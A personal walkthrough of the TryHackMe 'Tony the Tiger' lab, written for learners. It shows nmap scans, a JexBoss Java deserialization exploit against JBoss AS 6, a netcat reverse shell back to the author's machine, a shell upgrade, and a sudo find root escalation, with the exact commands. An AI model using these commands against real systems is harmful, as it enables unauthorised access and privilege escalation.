TryHackMe "Tony the Tiger" No Metasploit Walkthrough

Tony the Tiger Walkthrough

No Metasploit Edition

Tony the Tiger is a Java Serialization challenge where I actually didn't need to get fancy in order to exploit the machine.  All this challenge required was reading, good scanning and enumeration, Google Fu, and falling back on a college course that covered some stegonography concepts.  After completing the challenge I went through some of the other community guides listed in the course and found several different ways to accomplish this challenge, and I encourage you to check those out as well.  This challenge is a Free Room currently at https://tryhackme.com/room/tonythetiger.

Scanning

Once we've gotten our VPN set up we can begin scanning the machine.  As usual, I start with a basic nmap scan followed by a more specific nmap -A scan targeting the ports I've found.

nmap 10.10.115.125

nmap -A -p22,80,1090,1098,1099,4446,8009,8080,8083 10.10.115.125

As we can see we have a lot going on. Our first question in Task #3 is to describe what the service is running on Port 8080, and we see it is Apache Tomcat/Coyote JSP engine 1.1.  Our next question is the name of the front end, and that is JBoss.  Additionally, we have other web servers running, SSH, and a couple of other services we can look in to if necessary.

Stego Challenge

We'll start by checking out the website since the challenge tells us we need to find a flag somewhere on the page.  Checking out the blog we are met with a message in bold that suggests if Tony takes a picture we must know it has deeper meaning.  So let's grab the images. 

Blog page and images

Digging deep in to a college course I took that had some stego in it, I remembered that you can sometimes find hidden information (or THM flags) using a simple text editor.  So I opened both images in Notepad++ and found the flag we were looking for.  Alternatively you could use the strings command, followed by the image, to locate the flag as well (I tested this and can assure it's validity).

Notepad++ flag location

Now that we have completed this side challenge, we can get on with enumerating the machine and hopefully exploiting it.

Enumeration

We can now get to work on gaining access to the target machine.  It's running Linux from the looks of our scans, and is running as a webserver.  We've already checked out Port 80 briefly for the stego challenge, so let's move on to the the other server.  We see 8080 is open and running Tomcat/Coyote JSP engine 1.1.  We can also tell from the -A scan that Jboss AS is the header for the page.  So lets check that out first.  

JBoss AS page

We are met with a JBOSS AS console, which we are able to explore a bit.  Clicking the Administrative console takes us to a login page that shows us that this the version running is AS 6.

Login Page JBoss AS 6 Admin Console

Exploitation

Let's dig deeper into the console.  A Google search shows us that this version is definitely vulnerable to exploitation, and that a tool called JexBoss is available on Github. 

JexBoss Java Deserialization Exploitation Tool on GitHub

We have found the Github page, and exploring this tool more, we see that it exploits vulnerabilities in Java Deserialization.  So let's change directories to where we save our Tools, and then run the following command below (the developer really makes this easy for everyone).

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

Running this command closes the repository, changes directories to it automatically, pip installs the requirements, runs the help function for you to see, and then drops the last line in the terminal for you to modify to the target IP address to exploit.  Change that to your target IP address, and press enter.  If you've done everything correctly it should look like the below.  If not, please go over your steps once again.

python jexboss.py -u 10.10.115.125:8080

JexBoss has finished running, and we see that it even gives us a limited use command shell.  Reading up we see that we are the cnmatic user, running on Ubuntu 14.04, and that the shell allows us to easily create a reverse shell to our machine.  So let's do that.  We will need to open up a new terminal and start a Netcat listener, and then run one of the shell commands in the JexBoss tool.  With luck you should see a connection.  Note that below I used the bash version, which doesn't allow you to utilize sudo commands.  You will want to use a Python one liner such as this python -c 'import pty; pty.spawn("/bin/bash")' . I later ran the one liner to get a better shell.

nc -nlvp 4444; jexremote=10.11.1.198:4444; upgrade with the Python oneliner

If everything worked correctly you should get a command shell in a terminal.  If things didn't work right, please go back and check that your IP address matches your tun0 interface, and that you noted the proper ports.   If we change directories to our home directory, we can see there are three users available.  Let's first check out our own. There isn't much to see except a text file that says Java is insecure and a headache to upgrade (Yep! We figured that out for you).  

Changing directories into the jboss user, we can see a note that provides us with a password to the jboss account.

cat note - password disclosure for user jboss

 Logged in to Jboss user

This is ok, and allows us to pivot to another user, however it doesn't show us the flag we need for the challenge.  What will show us the flag, however, is using the command ls -la. This allows us to list all contents,  even those that are hidden.  Doing this reveals the .jboss.txt file and the flag for the user.

ls -la; cat .jboss.txt 

So we have a user flag, and now we need a root user.  The first stop anyone should do when trying to privesc a Linux user is run sudo -l.  This lists any sudo permissions a user may have.  As we can see, jboss is allowed to run the "find" command as a root user.  So we need to research how we might be able to use the find command to elevate privileges.

find command privesc command; Courtesy andreafortuna.org

So we know that the Find command can be used to elevate privileges, so let's give it a try.  Running the sudo find command above we see that we can, in fact, get a root user command line.  I then ran our Python one-liner from earlier to get a full function shell.

sudo find . -exec /bin/sh \; -quit

We are now the root user, and almost to the finish line.  We can move to the root user directory and find the root.txt flag.  

root user "flag"

We can see that this isn't a normal looking THM flag.  But it might be something else.  Anytime I'm met with something that is encoded, I start with Base64 and work from there.  So Google Base64 decoder, and paste your "flag" into the input.  With luck you should get some output.  Alternatively we can run base64 -d <<< 'base64valuehere' and get our output.

Base64 decoder

This looks like a hash.  We can do a couple things.  The easiest is to do is to run it through hash-identifier in Kali, which will return the hash type.  In this case, MD5.  We can go the long way and try using Hashcat to crack it, or we can use an online MD5 decrypt tool first to see if it catches.  In our case, doing this is successful.  

 MD5 hash crack value

Copy your found value, paste it in the TryHackMe dashboard, and you're finished with the challenge!  Congratulations.

Final Thoughts

This was a great challenge, and really requires good enumeration and researching to find your path in.  There are naturally additional ways to complete the challenge, including using the tool that is provided in the challenge, however I chose not to go that route.  Good job cmnatic on a great challenge!